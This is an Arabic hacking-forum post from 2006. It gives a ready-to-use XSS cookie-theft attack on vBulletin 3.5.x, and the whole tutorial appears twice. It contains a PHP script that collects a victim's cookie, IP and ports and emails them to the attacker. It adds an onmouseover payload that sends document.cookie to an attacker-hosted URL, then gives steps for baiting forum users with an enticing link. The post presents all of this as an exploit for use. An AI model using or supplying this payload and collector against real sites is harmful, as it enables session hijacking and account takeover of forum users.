bLoOd MoOn
17-04-2006, 08:01
Xss Vbulletin 3.5.x ( test: 3.5.4 )
آخر ثغرات الفي بي o|37|
ملاحظة : كل ****** استبدلها بكلمة c o o k i e لكن بدون مسافات |120|
--------------------------------------------------------------------
( 1 )
--------------------------------------------------------------------
حط الكود في ملف نوتباد ونسميه على سبيل المثال اكسبلويت بس لازم الامتداد مثل ماهو: exploit.php
--------------------------------------------------------------------
<?php
$ip_adresse = $_SERVER['REMOTE_ADDR'];
if(!empty($ip_adresse))
{
echo 'il tuo ip и: ',$ip_adresse;
}
else
{
echo 'Impossible d\'afficher l\'IP';
}
?>
<a href="log.php"></a><?
$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];
$day = date("d",time()); $month = date("m",time()); $year = date("Y",time());
if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;
else $visitor_info = $REMOTE_HOST;
$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;
$x1=`host $REMOTE_ADDR|grep Name`;
$x2=$REMOTE_PORT;
?>
<?php
$****** = $_GET['c'];
?>
<?php
$myemail = "YOUR ADDRESS E-MAIL";
$today = date("l, F j, Y, g:i a") ;
$subject = "Xss Vbulletin" ;
$message = "Xss: Hacking
Ip: $ip_adresse
******: $******
Url: $base
porta usata: $xx1
remote port: $x2
Giorno & Ora : $today \n
";
$from = "From: $myemail\r\n";
mail($myemail, $subject, $message, $from);
?>
--------------------------------------------------------------------
غير YOUR ADDRESS E-MAIL الموجودة في الكود اعلاه الأى ايميلك
--------------------------------------------------------------------
( 2 )
--------------------------------------------------------------------
الكود الي بالأسفل حطه بنوتباد واحفظه بأمتداد gif طبعا بعد تغيير http://YOUR ADDRESS WEB.com الى اسم الموقع الي رفعت عليه ملف exploit.php
image.gif <<<مثال
--------------------------------------------------------------------
<pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.******' b='</pre' >
--------------------------------------------------------------------
( 3 )
--------------------------------------------------------------------
طريقة التطبيق
--------------------------------------------------------------------
1° سوي مشاركة جديدة ومن ضمن المشاركة حط الكود الي بالاسفل
2° <a href="http://YOUR ADDRESS WEB.com/IMAGE.GIF" target="_blank">اكتب شي مغري هنا</a> '
3° اضغط على ارسال المشاركة
4° أنتظر رزقك :d
--------------------------------------------------------------------
اتمنى الشرح يكون واضح
تمتعوا بالخدمة |37|
ملاحظة لجماعة الكوبي بيست لا تنقل الموضوع بدون ذكر الكاتب|26| لأن الكاتب ممكن يخنقك |40| لوووول لذلك خليك متعاون
آخر ثغرات الفي بي o|37|
ملاحظة : كل ****** استبدلها بكلمة c o o k i e لكن بدون مسافات |120|
--------------------------------------------------------------------
( 1 )
--------------------------------------------------------------------
حط الكود في ملف نوتباد ونسميه على سبيل المثال اكسبلويت بس لازم الامتداد مثل ماهو: exploit.php
--------------------------------------------------------------------
<?php
$ip_adresse = $_SERVER['REMOTE_ADDR'];
if(!empty($ip_adresse))
{
echo 'il tuo ip и: ',$ip_adresse;
}
else
{
echo 'Impossible d\'afficher l\'IP';
}
?>
<a href="log.php"></a><?
$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];
$day = date("d",time()); $month = date("m",time()); $year = date("Y",time());
if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;
else $visitor_info = $REMOTE_HOST;
$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;
$x1=`host $REMOTE_ADDR|grep Name`;
$x2=$REMOTE_PORT;
?>
<?php
$****** = $_GET['c'];
?>
<?php
$myemail = "YOUR ADDRESS E-MAIL";
$today = date("l, F j, Y, g:i a") ;
$subject = "Xss Vbulletin" ;
$message = "Xss: Hacking
Ip: $ip_adresse
******: $******
Url: $base
porta usata: $xx1
remote port: $x2
Giorno & Ora : $today \n
";
$from = "From: $myemail\r\n";
mail($myemail, $subject, $message, $from);
?>
--------------------------------------------------------------------
غير YOUR ADDRESS E-MAIL الموجودة في الكود اعلاه الأى ايميلك
--------------------------------------------------------------------
( 2 )
--------------------------------------------------------------------
الكود الي بالأسفل حطه بنوتباد واحفظه بأمتداد gif طبعا بعد تغيير http://YOUR ADDRESS WEB.com الى اسم الموقع الي رفعت عليه ملف exploit.php
image.gif <<<مثال
--------------------------------------------------------------------
<pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.******' b='</pre' >
--------------------------------------------------------------------
( 3 )
--------------------------------------------------------------------
طريقة التطبيق
--------------------------------------------------------------------
1° سوي مشاركة جديدة ومن ضمن المشاركة حط الكود الي بالاسفل
2° <a href="http://YOUR ADDRESS WEB.com/IMAGE.GIF" target="_blank">اكتب شي مغري هنا</a> '
3° اضغط على ارسال المشاركة
4° أنتظر رزقك :d
--------------------------------------------------------------------
اتمنى الشرح يكون واضح
تمتعوا بالخدمة |37|
ملاحظة لجماعة الكوبي بيست لا تنقل الموضوع بدون ذكر الكاتب|26| لأن الكاتب ممكن يخنقك |40| لوووول لذلك خليك متعاون